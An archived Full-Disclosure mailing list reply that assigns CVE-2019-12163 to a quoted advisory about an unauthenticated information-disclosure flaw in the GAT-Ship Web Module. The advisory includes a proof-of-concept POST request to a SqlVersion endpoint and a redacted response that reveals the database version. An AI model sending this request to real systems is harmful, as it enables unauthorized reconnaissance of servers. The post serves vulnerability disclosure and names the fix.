lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Date: Fri, 17 May 2019 22:21:34 +0200 (CEST)
From: <gionreale@...anota.com>
To: Fulldisclosure <fulldisclosure@...lists.org>
Subject: Re: [FD] GAT-Ship Web Module >1.30 - Unauthenticated Information
 Disclosure Vulnerability

CVE-2019-12163.

>
> GAT-Ship Web Module >1.30 - Unauthenticated Information Disclosure Vulnerability
>
>
> It is possible in versions 1.30 and below for unauthenticated attackers to query the GAT-Ship Web Module for system information via a crafted request:
>
> PoC:
> ---------------------------------------------------------------------------------------------------------------------------------------
>
> POST /ws/> gatshipWs.asmx/SqlVersion <http://gatshipWs.asmx/SqlVersion>>  HTTP/1.1
> User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
> Accept: application/json, text/javascript, */*; q=0.01
> Accept-Language: en-US,en;q=0.5
> Accept-Encoding: gzip, deflate
> Content-Type: application/json; charset=utf-8
> X-Requested-With: XMLHttpRequest>  
> Content-Length: 2
> DNT: 1
> Connection: close
>
> {}
>
> --------------------------------------------------------------------------------------------------------------------------------------------------
>
>
>
>
> HTTP/1.1 200 OK
> Cache-Control: private, max-age=0
> Content-Type: application/json; charset=utf-8
> Server: Microsoft-IIS/X.X
> X-AspNet-Version: X.X.XXXXX
> X-Powered-By: ASP.NET
> Date: Mon, XX XXX 20XX 06:55:31 GMT
> Connection: close
> Content-Length: 310
>
> {"d":{"__type":"webModule.ws.gatshipWs+ResponsObject","ResponsType":0,"MessageText":null,"Data":"Microsoft SQL Server 20XX (SPX) - XX.X.XXXX.X (X64) \n\tDec 28 20XX 20:23:12 \n\tCopyright (c) Microsoft Corporation\n\tStandard Edition (64-bit) on Windows XX XX \u003cX64\u003e (Build XXXX: Service Pack X)\n"}}
>
> ===================================================================================
>
> Values in PoC removed for security reasons.
>
>
> Disclosed: > 16 Jul 2018
>
> Fix: Upgrade to current version.
>
>
> Discovered by Gionathan Armando Reale
>
>


_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ